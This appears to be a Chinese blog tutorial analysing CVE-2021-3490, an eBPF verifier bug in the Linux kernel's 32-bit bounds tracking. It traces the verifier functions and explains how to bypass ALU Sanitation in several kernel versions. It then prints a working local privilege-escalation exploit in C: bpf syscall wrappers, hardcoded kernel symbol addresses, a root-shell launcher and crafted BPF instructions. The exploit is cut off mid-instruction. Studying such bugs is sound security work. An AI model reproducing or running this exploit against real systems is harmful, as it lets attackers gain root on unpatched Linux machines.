本文主要是介绍CVE-2021-3490:ebpf verifier 寄存器32位范围更新错误导致越界读写【ALU Sanitation 绕过】,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
文章目录
- 前言
- 漏洞分析
- 构造 vuln reg
- 漏洞利用
- ALU Sanitation
- Linux v5.11.8 – 5.11.16 版本
- Linux v5.11.8 之前的版本
- Linux v5.11.16 之后的版本
- exp 及效果演示
- 漏洞修复
- 参考
前言
影响版本:Linux 5.7-rc1 ~ Linux 5.13-rc4
编译选项:CONFIG_BPF_SYSCALL
,config
所有带 BPF
字样的编译选项。General setup —> Choose SLAB allocator (SLUB (Unqueued Allocator)) —> SLAB
。CONFIG_E1000和CONFIG_E1000E
,变更为=y。
漏洞概述:Linux内核中按位操作(AND、OR 和 XOR)的 eBPF ALU32 边界跟踪没有正确更新 32 位边界,造成 Linux 内核中的越界读取和写入,从而导致任意代码执行。三个漏洞函数分别是 scalar32_min_max_and()
、scalar32_min_max_or()
、scalar32_min_max_xor()
。
测试环境:测试环境 linux-5.11.16
漏洞分析
本文主要以 scalar32_min_max_and
漏洞函数进行分析理由,其它两个漏洞函数都是一样的其实。漏洞函数调用链如下:
bpf_checkdo_check_maindo_check_commondo_checkcheck_alu_opadjust_reg_min_max_valsadjust_scalar_min_max_valsscalar32_min_max_and
adjust_scalar_min_max_vals
函数如下:
static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env,struct bpf_insn *insn,struct bpf_reg_state *dst_reg,struct bpf_reg_state src_reg)
{
......case BPF_AND:dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off); scalar32_min_max_and(dst_reg, &src_reg);scalar_min_max_and(dst_reg, &src_reg);break;case BPF_OR:dst_reg->var_off = tnum_or(dst_reg->var_off, src_reg.var_off);scalar32_min_max_or(dst_reg, &src_reg);scalar_min_max_or(dst_reg, &src_reg);break;case BPF_XOR:dst_reg->var_off = tnum_xor(dst_reg->var_off, src_reg.var_off);scalar32_min_max_xor(dst_reg, &src_reg);scalar_min_max_xor(dst_reg, &src_reg);break;
....../* ALU32 ops are zero extended into 64bit register */if (alu32)zext_32_to_64(dst_reg);__update_reg_bounds(dst_reg);__reg_deduce_bounds(dst_reg);__reg_bound_offset(dst_reg);return 0;
}
可以看到在执行完相应的 ALU
操作后,会执行 scalar32_min_max_XXX/scalar_min_max_XXX
函数计算 32/64 位边界,其中scalar32_min_max_and
函数如下:
static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,struct bpf_reg_state *src_reg)
{bool src_known = tnum_subreg_is_const(src_reg->var_off);bool dst_known = tnum_subreg_is_const(dst_reg->var_off);struct tnum var32_off = tnum_subreg(dst_reg->var_off);s32 smin_val = src_reg->s32_min_value;u32 umax_val = src_reg->u32_max_value;// 当 32 位值已知时,直接返回,不作范围调整if (src_known && dst_known)return;dst_reg->u32_min_value = var32_off.value;dst_reg->u32_max_value = min(dst_reg->u32_max_value, umax_val);if (dst_reg->s32_min_value < 0 || smin_val < 0) {dst_reg->s32_min_value = S32_MIN;dst_reg->s32_max_value = S32_MAX;} else {dst_reg->s32_min_value = dst_reg->u32_min_value;dst_reg->s32_max_value = dst_reg->u32_max_value;}}
可以看到在 scalar32_min_max_and
函数,如果两个寄存器的低 32 位值都是 known
的就直接跳过,因为其认为在 64 位中会做相应的调整,scalar_min_max_and
函数如下:
static void scalar_min_max_and(struct bpf_reg_state *dst_reg,struct bpf_reg_state *src_reg)
{bool src_known = tnum_is_const(src_reg->var_off); // { value = 0x1 0000 0002, mask = 0}bool dst_known = tnum_is_const(dst_reg->var_off); // { value = 1, mask = 0x100000000 }s64 smin_val = src_reg->smin_value; // smin_val = 0x1 0000 0002u64 umax_val = src_reg->umax_value; // umax_val = 0x1 0000 0002// 当 64 位已知时,进行 mark knownif (src_known && dst_known) {__mark_reg_known(dst_reg, dst_reg->var_off.value);return;}dst_reg->umin_value = dst_reg->var_off.value; // dst_reg->umin_value = 1dst_reg->umax_value = min(dst_reg->umax_value, umax_val); // dst_reg->umax_value = 0x1 0000 0002if (dst_reg->smin_value < 0 || smin_val < 0) {dst_reg->smin_value = S64_MIN;dst_reg->smax_value = S64_MAX;} else {dst_reg->smin_value = dst_reg->umin_value;dst_reg->smax_value = dst_reg->umax_value;}/* We may learn something more from the var_off */__update_reg_bounds(dst_reg);
}
__mark_reg_known
函数的逻辑很简单,就是设置范围为一个常数:
static void ___mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{reg->var_off = tnum_const(imm);reg->smin_value = (s64)imm;reg->smax_value = (s64)imm;reg->umin_value = imm;reg->umax_value = imm;reg->s32_min_value = (s32)imm;reg->s32_max_value = (s32)imm;reg->u32_min_value = (u32)imm;reg->u32_max_value = (u32)imm;
}static void __mark_reg_known(struct bpf_reg_state *reg, u64 imm)
{/* Clear id, off, and union(map_ptr, range) */memset(((u8 *)reg) + sizeof(reg->type), 0,offsetof(struct bpf_reg_state, var_off) - sizeof(reg->type));___mark_reg_known(reg, imm);
}
如果两个寄存器 64 位都是已知的,那么其是不存在问题的,因为在 ___mark_reg_known
函数中更新了 32 位范围。但是 64 位不一定是已知的,即存在一种情况:两个寄存器的低 32 位是已知的,但是其高 32 位不确定。那么此时整个流程就忽略了对 32 位范围的更新。比如如下例子:
R6 = { .value = 1, .mask = 0xffffffff00000000 }
R8 = { .value = 0x100000002, mask = 0 }
我们模拟跟踪下 R6 & R8
执行过程中,寄存器值范围的变化:
case BPF_AND:dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off); scalar32_min_max_and(dst_reg, &src_reg);scalar_min_max_and(dst_reg, &src_reg);break
......__update_reg_bounds(dst_reg);__reg_deduce_bounds(dst_reg);__reg_bound_offset(dst_reg);
1 dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off);
tnum_and
函数如下:
struct tnum tnum_and(struct tnum a, struct tnum b)
{u64 alpha, beta, v;// a = R6 = { value = 1, mask = 0xffffffff00000000 }// b = R8 = { value = 0x100000002, mask = 0}alpha = a.value | a.mask; // alpha = 0xffffffff00000001beta = b.value | b.mask; // beta = 0x100000002v = a.value & b.value; // v = 0return TNUM(v, alpha & beta & ~v); // { value = 0, mask = 0x100000000 }
}
两个寄存器的初始状态如下:
R6
:
R8
:
所以执行完 dst_reg->var_off = tnum_and(dst_reg->var_off, src_reg.var_off);
后,dst_reg->var_off = { value = 0, mask = 0x100000000 }
,即其只有第 32 位是未知的
2 scalar32_min_max_and(dst_reg, &src_reg);
static void scalar32_min_max_and(struct bpf_reg_state *dst_reg,struct bpf_reg_state *src_reg)
{bool src_known = tnum_subreg_is_const(src_reg->var_off);bool dst_known = tnum_subreg_is_const(dst_reg->var_off);struct tnum var32_off = tnum_subreg(dst_reg->var_off);s32 smin_val = src_reg->s32_min_value;u32 umax_val = src_reg->u32_max_value;if (src_known && dst_known)return;
......
}
tnum_subreg_is_const
函数就是检查寄存器的低 32 位是否已知:
static inline bool tnum_subreg_is_const(struct tnum a)
{return !(tnum_subreg(a)).mask;
}struct tnum tnum_subreg(struct tnum a)
{return tnum_cast(a, 4);
}struct tnum tnum_cast(struct tnum a, u8 size)
{a.value &= (1ULL << (size * 8)) - 1;a.mask &= (1ULL << (size * 8)) - 1;return a;
}
这里 dst_reg/src_reg
的低 32 位都是已知的,所以会直接返回
3 scalar_min_max_and(dst_reg, &src_reg);
static void scalar_min_max_and(struct bpf_reg_state *dst_reg,struct bpf_reg_state *src_reg)
{bool src_known = tnum_is_const(src_reg->var_off); // { value = 0x1 0000 0002, mask = 0}bool dst_known = tnum_is_const(dst_reg->var_off); // { value = 0, mask = 0x100000000 }s64 smin_val = src_reg->smin_value; // smin_val = 0x1 0000 0002u64 umax_val = src_reg->umax_value; // umax_val = 0x1 0000 0002// 这里 dst_reg 是未知的,所以不会执行 __mark_reg_knownif (src_known && dst_known) {__mark_reg_known(dst_reg, dst_reg->var_off.value);return;}dst_reg->umin_value = dst_reg->var_off.value; // dst_reg->umin_value = 0dst_reg->umax_value = min(dst_reg->umax_value, umax_val); // dst_reg->umax_value = 0x1 0000 0002// 这里 dst_reg->smin_value < 0,所以会执行 if 分支if (dst_reg->smin_value < 0 || smin_val < 0) {dst_reg->smin_value = S64_MIN;dst_reg->smax_value = S64_MAX;} else {dst_reg->smin_value = dst_reg->umin_value;dst_reg->smax_value = dst_reg->umax_value;}__update_reg_bounds(dst_reg);
}
在这里 dst_reg->smin_value/smax_value
会被设置为最小值/最大值,然后执行 __update_reg_bounds(dst_reg);
:
static void __update_reg_bounds(struct bpf_reg_state *reg)
{__update_reg32_bounds(reg);__update_reg64_bounds(reg);
}
这里我们主要关注 __update_reg32_bounds(reg);
:
static void __update_reg32_bounds(struct bpf_reg_state *reg)
{struct tnum var32_off = tnum_subreg(reg->var_off);/* min signed is max(sign bit) | min(other bits) */// s32_min_value = max_t(s32, 1, 0) = 1reg->s32_min_value = max_t(s32, reg->s32_min_value,var32_off.value | (var32_off.mask & S32_MIN)); // s32_min_value = 1/* max signed is min(sign bit) | max(other bits) */// s32_max_value = min_t(s32, 1, 0) = 0reg->s32_max_value = min_t(s32, reg->s32_max_value,var32_off.value | (var32_off.mask & S32_MAX)); // s32_max_value = 0reg->u32_min_value = max_t(u32, reg->u32_min_value, (u32)var32_off.value); // u32_min_value = 1reg->u32_max_value = min(reg->u32_max_value,(u32)(var32_off.value | var32_off.mask)); // u32_max_value = 0
}
由于之前没有更新 32 位范围,所以 dst_reg
之前的 s32_min_value/s32_max_value/u32_min_value/u32_max_value
全都是一,但是经过 AND
操作后,dst_reg
的 var_off
为 { value = 0, mask = 0x100000000 }
,所以在经过 __update_reg32_bounds
处理后,你会发现 s32_min_value = u32_min_value = 1
,而 s32_max_value = u32_max_value = 0
,即寄存器 32 位范围成了 [1, 0]
,这显然是不对的。所以漏洞的本质就是:当寄存器低 32 位已知时,没有更新寄存器低 32 位范围。然后后面 3 个函数暂时先不分析。
所以经过上述操作后,此时 R6
的寄存器状态如下:
这里我们的目的还是去构造一个寄存器 vuln reg
:其验证阶段值为0,实际运行时值为1
构造 vuln reg
这里回忆一下上述构造的 R6
寄存器的状态:
R6: var_off = { .value = 0, .mask = 0x1_0000_0000 }s32_min_value = 1, s32_max_value = 0u32_min_value = 1, u32_max_value = 0
这时我们在构造一个寄存器 R8
,其状态如下:
R8:var_off = { .value = 0, mask = 1 } real_value = 0s32_min_value = 0, s32_max_value = 1u32_min_value = 0, u32_max_value = 1
R6+R8
后会执行如下操作:
case BPF_ADD:scalar32_min_max_add(dst_reg, &src_reg);scalar_min_max_add(dst_reg, &src_reg);dst_reg->var_off = tnum_add(dst_reg->var_off, src_reg.var_off);break;
......__update_reg_bounds(dst_reg);__reg_deduce_bounds(dst_reg);__reg_bound_offset(dst_reg);
主要我们关注的是 32 位范围,所以看下 scalar32_min_max_add
函数:
static void scalar32_min_max_add(struct bpf_reg_state *dst_reg,struct bpf_reg_state *src_reg)
{s32 smin_val = src_reg->s32_min_value;s32 smax_val = src_reg->s32_max_value;u32 umin_val = src_reg->u32_min_value;u32 umax_val = src_reg->u32_max_value;if (signed_add32_overflows(dst_reg->s32_min_value, smin_val) ||signed_add32_overflows(dst_reg->s32_max_value, smax_val)) {dst_reg->s32_min_value = S32_MIN;dst_reg->s32_max_value = S32_MAX;} else {dst_reg->s32_min_value += smin_val;dst_reg->s32_max_value += smax_val;}if (dst_reg->u32_min_value + umin_val < umin_val ||dst_reg->u32_max_value + umax_val < umax_val) {dst_reg->u32_min_value = 0;dst_reg->u32_max_value = U32_MAX;} else {dst_reg->u32_min_value += umin_val;dst_reg->u32_max_value += umax_val;}
}
这里是不存在溢出的,所以会将对于的范围边界值相加,所以相加后其 R6
状态如下:
R6:vaf_off = { .value = 0, .mask = 0x1_0000_0000 }s32_min_value = 1, s32_max_value = 1u32_min_value = 1, u32_max_value = 1
然后执行 dst_reg->var_off = tnum_add(dst_reg->var_off, src_reg.var_off);
:
struct tnum tnum_add(struct tnum a, struct tnum b)
{u64 sm, sv, sigma, chi, mu;// { .value = 0, .mask = 0x1_0000_0000 } + { .value = 0, mask = 1 }// sm = 0x1_0000_0001, sv = 0sm = a.mask + b.mask;sv = a.value + b.value;sigma = sm + sv; // sigma = 0x1_0000_0001chi = sigma ^ sv; // chi = 0x1_0000_0001mu = chi | a.mask | b.mask; // mu = 0x1_0000_0001return TNUM(sv & ~mu, mu); // { 0, 0x1_0000_0001 }
}
所以执行完 tnum_add
后 R6
的状态为:
R6:vaf_off = { .value = 0, .mask = 0x1_0000_0001 }s32_min_value = 1, s32_max_value = 1u32_min_value = 1, u32_max_value = 1
然后 __update_reg_bounds(dst_reg);/__reg_deduce_bounds(dst_reg);
并不会对 R6
的状态产生影响,这里读者感兴趣可以自行分析一下,比较简单。主要是 __reg_bound_offset(dst_reg);
,其会将范围反馈到寄存器的值,函数定义如下:
/* Attempts to improve var_off based on unsigned min/max information */
static void __reg_bound_offset(struct bpf_reg_state *reg)
{struct tnum var64_off = tnum_intersect(reg->var_off, tnum_range(reg->umin_value, reg->umax_value));struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off),tnum_range(reg->u32_min_value,reg->u32_max_value)); reg->var_off = tnum_or(tnum_clear_subreg(var64_off), var32_off);
}
这里我还是只关注 32 位范围,记住此时 R6
的状态:
R6:vaf_off = { .value = 0, .mask = 0x1_0000_0001 }s32_min_value = 1, s32_max_value = 1u32_min_value = 1, u32_max_value = 1
我们将 struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off), tnum_range(reg->u32_min_value, reg->u32_max_value));
进行拆分:
tnum_range
函数定义如下:这里传入的 min = max = 1
struct tnum tnum_range(u64 min, u64 max)
{u64 chi = min ^ max, delta; // min = 1, max = 1 ==> chi = 0u8 bits = fls64(chi); // bits = 0/* special case, needed because 1ULL << 64 is undefined */if (bits > 63)return tnum_unknown;delta = (1ULL << bits) - 1; // delta = 0return TNUM(min & ~delta, delta); // { value = 1, mask = 0 }
}
所以这里 tnum_range(reg->u32_min_value, reg->u32_max_value)); = { value = 1, mask = 0 }
tnum_subreg(reg->var_off)
就不多说了,取低 32 位,所以返回的是 { value = 0, mask = 1 }
所以最后就是:struct tnum var32_off = tnum_intersect( { value = 1, mask = 0 }, { value = 0, mask = 1 }
:
struct tnum tnum_intersect(struct tnum a, struct tnum b)
{u64 v, mu;// a = { value = 1, mask = 0 }, b = { value = 0, mask = 1 }v = a.value | b.value; // v = 1mu = a.mask & b.mask; // mu = 0return TNUM(v & ~mu, mu); // { 1, 0 }
}
所以最后 R6
寄存器的状态为:
R6:vaf_off = { .value = 1, .mask = 0x1_0000_0000 }s32_min_value = 1, s32_max_value = 1u32_min_value = 1, u32_max_value = 1
所以可以看到最后在验证阶段,R6
的低 32 位被当作了常数1(当然这里构造了 32 位,自然就构造了 64 位,比如我们只需要 AND 1
即可),但是注意 R6/R8
在实际运行时都是0,所以 R6+R8
应当是0,所以实际运行时最后 R6
应当是0(自然低 32 位应当是0)。
所以经过上述步骤,我们成功的构造了一个在验证阶段为 1
,而在实际运行时为 0
的寄存器 R6
。但是我们需要的是在验证阶段为 0
,而在实际运行时为 1
的寄存器,所以这里似乎反了。但是解决方案比较简单,我们可以先将 R6 + 1
,这样就构造了一个验证阶段为 2
,实际运行为 1
的寄存器 R6
,然后在 AND 1
,这样就成功的构造了一个验证阶段为 0
,实际运行为 1
的寄存器 R6
了
漏洞利用
构造好了验证阶段为 0
,实际运行为 1
的寄存器之后,其利用就比较常规了。但是这里需要注意 ALU Sanitation
机制。
ALU Sanitation
ALU Sanitation
是一个用于运行时动态检测的功能,通过对程序正在处理的实际值进行运行时检查以弥补 verifier
静态分析的不足,这项技术通过调用 fixup_bpf_calls()
为 eBPF
程序中的每一条指令的前面都添加上额外的辅助指令来实现。
Linux v5.11.8 – 5.11.16 版本
对于 BPF_ADD
及 BPF_SUB
这样的指令而言,会添加如下辅助指令【linux-5.11.16】:
static int fixup_bpf_calls(struct bpf_verifier_env *env)
{
......for (i = 0; i < insn_cnt; i++, insn++) {......if (insn->code == (BPF_ALU64 | BPF_ADD | BPF_X) ||insn->code == (BPF_ALU64 | BPF_SUB | BPF_X)) {const u8 code_add = BPF_ALU64 | BPF_ADD | BPF_X;const u8 code_sub = BPF_ALU64 | BPF_SUB | BPF_X;struct bpf_insn insn_buf[16];struct bpf_insn *patch = &insn_buf[0];bool issrc, isneg;u32 off_reg;aux = &env->insn_aux_data[i + delta];if (!aux->alu_state ||aux->alu_state == BPF_ALU_NON_POINTER)continue;isneg = aux->alu_state & BPF_ALU_NEG_VALUE;issrc = (aux->alu_state & BPF_ALU_SANITIZE) ==BPF_ALU_SANITIZE_SRC;off_reg = issrc ? insn->src_reg : insn->dst_reg;if (isneg)*patch++ = BPF_ALU64_IMM(BPF_MUL, off_reg, -1);*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit);*patch++ = BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg);*patch++ = BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg);*patch++ = BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0);*patch++ = BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63);if (issrc) {*patch++ = BPF_ALU64_REG(BPF_AND, BPF_REG_AX,off_reg);insn->src_reg = BPF_REG_AX;} else {*patch++ = BPF_ALU64_REG(BPF_AND, off_reg,BPF_REG_AX);}if (isneg)insn->code = insn->code == code_add ?code_sub : code_add;*patch++ = *insn;if (issrc && isneg)*patch++ = BPF_ALU64_IMM(BPF_MUL, off_reg, -1);cnt = patch - insn_buf;new_prog = bpf_patch_insn_data(env, i + delta, insn_buf, cnt);if (!new_prog)return -ENOMEM;delta += cnt - 1;env->prog = prog = new_prog;insn = new_prog->insnsi + i + delta;continue;}......return 0;
}
其中 aux->alu_limit
为当前指针运算范围,初始时为 0,与指针所做的常量运算同步,对于减法而言可读范围为 (ptr - alu_limit, ptr]
(以指针最初指向的地址为 0),因此我们还需要绕过这个检查
由于我们有运行时为 1,verifier
认为是 0 的寄存器,我们可以这样调整范围:
- 构造另外一个同样是运行时值为 1、
verifier
认为是 0 的寄存器R8
- 将
R8
乘上一个不大于value size
的值(例如value size
为 0x1000,R8
便设为 0x1000) - 将指向
map
第一个元素第一个字节value[0]
的寄存器(假设为R7
)先加上 0x1000,此时alu_limit
变为 0x1000,R7
指向value[0x1000]
R7 -= R8
,由于verifier
认为R8
为 0,因此alu_limit
保持不变,但R7
实际上已经指回了value[0]
即通过如下指令即可绕过:
BPF_MOV64_REG(BPF_REG_8, BPF_REG_6),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000),
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000),
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8),
Linux v5.11.8 之前的版本
在内核版本 5.11.8
之前 ALU Sanitation
存在一个漏洞,即 aux_alu_limit
被初始化为 0 从而导致 0-1
造成整型溢出变为一个巨大的值,在这个 commit 中才被修复,因此对于 5.11.8
之前版本的内核而言是不需要绕过该检查的
static int retrieve_ptr_limit(const struct bpf_reg_state *ptr_reg,u32 *ptr_limit, u8 opcode, bool off_is_neg)
{bool mask_to_left = (opcode == BPF_ADD && off_is_neg) ||(opcode == BPF_SUB && !off_is_neg);u32 off;switch (ptr_reg->type) {case PTR_TO_STACK:/* Indirect variable offset stack access is prohibited in* unprivileged mode so it's not handled here.*/off = ptr_reg->off + ptr_reg->var_off.value;if (mask_to_left)*ptr_limit = MAX_BPF_STACK + off;else*ptr_limit = -off;return 0;case PTR_TO_MAP_VALUE:if (mask_to_left) {*ptr_limit = ptr_reg->umax_value + ptr_reg->off;} else {off = ptr_reg->smin_value + ptr_reg->off;*ptr_limit = ptr_reg->map_ptr->value_size - off;}return 0;default:return -EINVAL;}
}......
if (insn->code == (BPF_ALU64 | BPF_ADD | BPF_X) ||insn->code == (BPF_ALU64 | BPF_SUB | BPF_X)) {const u8 code_add = BPF_ALU64 | BPF_ADD | BPF_X;const u8 code_sub = BPF_ALU64 | BPF_SUB | BPF_X;struct bpf_insn insn_buf[16];struct bpf_insn *patch = &insn_buf[0];bool issrc, isneg;u32 off_reg;aux = &env->insn_aux_data[i + delta];if (!aux->alu_state ||aux->alu_state == BPF_ALU_NON_POINTER)continue;isneg = aux->alu_state & BPF_ALU_NEG_VALUE;issrc = (aux->alu_state & BPF_ALU_SANITIZE) ==BPF_ALU_SANITIZE_SRC;off_reg = issrc ? insn->src_reg : insn->dst_reg;if (isneg)*patch++ = BPF_ALU64_IMM(BPF_MUL, off_reg, -1);*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit - 1);*patch++ = BPF_ALU64_REG(BPF_SUB, BPF_REG_AX, off_reg);*patch++ = BPF_ALU64_REG(BPF_OR, BPF_REG_AX, off_reg);*patch++ = BPF_ALU64_IMM(BPF_NEG, BPF_REG_AX, 0);*patch++ = BPF_ALU64_IMM(BPF_ARSH, BPF_REG_AX, 63);......
Linux v5.11.16 之后的版本
目前最新的 ALU Sanitation
保护机制。2021年4月 ALU Sanitation
引入新的 patch—commit 7fedb63a8307,新增了两个特性。
- 一是
alu_limit
计算方法变了,不再用指针寄存器的位置来计算,而是使用offset
寄存器。例如,假设有个寄存器的无符号边界是umax_value = 1, umin_value = 0
,则计算出alu_limit = 1
,表示如果该寄存器在运行时超出边界,则指针运算不会使用该寄存器。 - 二是在
runtime
时会用立即数替换掉verifier
认定为常数的寄存器。例如,BPF_ALU64_REG(BPF_ADD, BPF_REG_2, EXPLOIT_REG)
,EXPLOIT_REG
被verifier
认定为0,但运行时为1,则将该指令改为BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 0)
。这个补丁本来是为了防侧信道攻击,同时也阻止了CVE-2021-3490
漏洞的利用。
以下补丁可看出,如果不确定offset寄存器是否为常量,则根据其alu_limit进行检查;如果确定其为常量,则用其常量值将其操作patch为立即数指令。
bool off_is_imm = tnum_is_const(off_reg->var_off);
alu_state |= off_is_imm ? BPF_ALU_IMMEDIATE : 0;
isimm = aux->alu_state & BPF_ALU_IMMEDIATE;
...
if (isimm) {*patch++ = BPF_MOV32_IMM(BPF_REG_AX, aux->alu_limit);} else {// Patch alu_limit check instructions....}
这两个新特性的引入使得本文所用的攻击方法近乎完全失效,不过这并不代表我们不能完成利用,在 D^3CTF2022-d3bpf-v2 中来自 vidar-team 的 chuj 师傅展示了一个新的技巧——由于 bpf_skb_load_bytes()
会将一个 sk_buff
的数据读到栈上,因此我们可以利用运行时为 1、verifier 确信为 0 的寄存器构造一个较长的 len
参数,从而使得数据拷贝时发生栈溢出
我们或许还需要额外的办法泄露内核地址,一个可行的方式是直接造成 kernel oops
后通过 dmesg
泄露出内核信息,这个技巧对于总会设置 oops=panic
的 CTF 题并不可用,但是大部分的真实世界环境其实都不会在 soft panic 发生时直接 panic (/proc/sys/kernel/panic_on_oops == 0
),因此这个方法的可行性其实还是挺高的
exp 及效果演示
exp
如下:
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <ctype.h>
#include <sched.h>
#include <sys/types.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <linux/if_packet.h>
#include <linux/bpf.h>
#include "bpf_insn.h"void err_exit(char *msg)
{printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);sleep(2);exit(EXIT_FAILURE);
}void info(char *msg)
{printf("\033[35m\033[1m[+] %s\n\033[0m", msg);
}void hexx(char *msg, size_t value)
{printf("\033[32m\033[1m[+] %s: \033[0m%#lx\n", msg, value);
}void binary_dump(char *desc, void *addr, int len) {uint64_t *buf64 = (uint64_t *) addr;uint8_t *buf8 = (uint8_t *) addr;if (desc != NULL) {printf("\033[33m[*] %s:\n\033[0m", desc);}for (int i = 0; i < len / 8; i += 4) {printf(" %04x", i * 8);for (int j = 0; j < 4; j++) {i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");}printf(" ");for (int j = 0; j < 32 && j + i * 8 < len; j++) {printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');}puts("");}
}/* root checker and shell poper */
void get_root_shell(void)
{if(getuid()) {puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");sleep(2);exit(EXIT_FAILURE);}puts("\033[32m\033[1m[+] Successful to get the root. \033[0m");puts("\033[34m\033[1m[*] Execve root shell now...\033[0m");system("/bin/sh");/* to exit the process normally, instead of segmentation fault */exit(EXIT_SUCCESS);
}/* bind the process to specific core */
void bind_core(int core)
{cpu_set_t cpu_set;CPU_ZERO(&cpu_set);CPU_SET(core, &cpu_set);sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}static inline int bpf(int cmd, union bpf_attr *attr)
{return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,unsigned int value_size, unsigned int max_entries)
{union bpf_attr attr = {.map_type = map_type,.key_size = key_size,.value_size = value_size,.max_entries = max_entries,};return bpf(BPF_MAP_CREATE, &attr);
}static __always_inline int
bpf_map_lookup_elem(int map_fd, const void* key, void* value)
{union bpf_attr attr = {.map_fd = map_fd,.key = (uint64_t)key,.value = (uint64_t)value,};return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}static __always_inline int
bpf_map_update_elem(int map_fd, const void* key, const void* value, uint64_t flags)
{union bpf_attr attr = {.map_fd = map_fd,.key = (uint64_t)key,.value = (uint64_t)value,.flags = flags,};return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}static __always_inline int
bpf_map_delete_elem(int map_fd, const void* key)
{union bpf_attr attr = {.map_fd = map_fd,.key = (uint64_t)key,};return bpf(BPF_MAP_DELETE_ELEM, &attr);
}static __always_inline int
bpf_map_get_next_key(int map_fd, const void* key, void* next_key)
{union bpf_attr attr = {.map_fd = map_fd,.key = (uint64_t)key,.next_key = (uint64_t)next_key,};return bpf(BPF_MAP_GET_NEXT_KEY, &attr);
}static __always_inline uint32_t
bpf_map_get_info_by_fd(int map_fd)
{struct bpf_map_info info;union bpf_attr attr = {.info.bpf_fd = map_fd,.info.info_len = sizeof(info),.info.info = (uint64_t)&info,};bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);return info.btf_id;
}int sockets[2];
int map_fd;
int expmap_fd;
int prog_fd;
uint32_t key;
uint64_t* value1;
uint64_t* value2;
uint64_t array_map_ops = 0xffffffff82b0d040;
uint64_t init_cred = 0xffffffff8398fca0;
uint64_t init_task = 0xffffffff83824a80;
uint64_t init_nsproxy = 0xffffffff8398e9c0;
uint64_t map_addr = -1;
uint64_t koffset = -1;
uint64_t kbase = -1;
uint64_t tag = 0x6159617a6f616958;
uint64_t current_task;struct bpf_insn prog[] = {BPF_LD_MAP_FD(BPF_REG_1, 3), // r1 = [map_fd] = bpf_map ptr1BPF_MOV64_IMM(BPF_REG_6, 0), // r6 = 0BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_6, -8), // *(uint64_t*)(fp - 8) = r6 = 0BPF_MOV64_REG(BPF_REG_7, BPF_REG_10), // r7 = r10 = fpBPF_ALU64_IMM(BPF_ADD, BPF_REG_7, -8), // r7 = r7 - 8 = fp - 8BPF_MOV64_REG(BPF_REG_2, BPF_REG_7), // r2 = r7 = fp - 8BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), // args: r1 = bpf_map ptr1, r2 = fp - 8BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), // if r0 <= r0 goto pc+1 rightBPF_EXIT_INSN(), // exitBPF_MOV64_REG(BPF_REG_9, BPF_REG_0), // r9 = r0 = value_buf1 ptrBPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_9, 0), // r6 = *(uint64_t*)r9 = value_buf1[0] = 0BPF_MOV64_IMM(BPF_REG_8, 0xffffffff), // r8 = 0xffffffffBPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32), // r8 = 0xffffffff00000000BPF_ALU64_REG(BPF_AND, BPF_REG_6, BPF_REG_8), // r6 = r6 & r8 = r6 & 0xffffffff00000000 ==> r6 = 0BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1), // r6 = r6 + 1 = 1BPF_MOV64_IMM(BPF_REG_8, 1), // r8 = 1BPF_ALU64_IMM(BPF_LSH, BPF_REG_8, 32), // r8 = 0x100000000 = { value = 0x100000000, mask = 0 }BPF_ALU64_IMM(BPF_ADD, BPF_REG_8, 2), // r8 = 0x100000002 = { value = 0x100000002, maks = 0 }BPF_ALU64_REG(BPF_AND, BPF_REG_6, BPF_REG_8), // r6 = 0 | [1, 0]BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_9, 0), // r8 = value_buf1[0] = 0BPF_ALU64_IMM(BPF_AND, BPF_REG_8, 1), // r8 = r8 & 1 = 0BPF_ALU64_REG(BPF_ADD, BPF_REG_6, BPF_REG_8), // r6 = r6 + r8 = 0BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1), // r6 = r6 + 1 = 1BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 1), // r6 = r6 & 1 = 1BPF_ALU64_IMM(BPF_ADD, BPF_REG_6, 1), // r6 = r6 + 1 = 2BPF_ALU64_IMM(BPF_AND, BPF_REG_6, 2), // r6 = r6 & 2 = 2 & 2 = 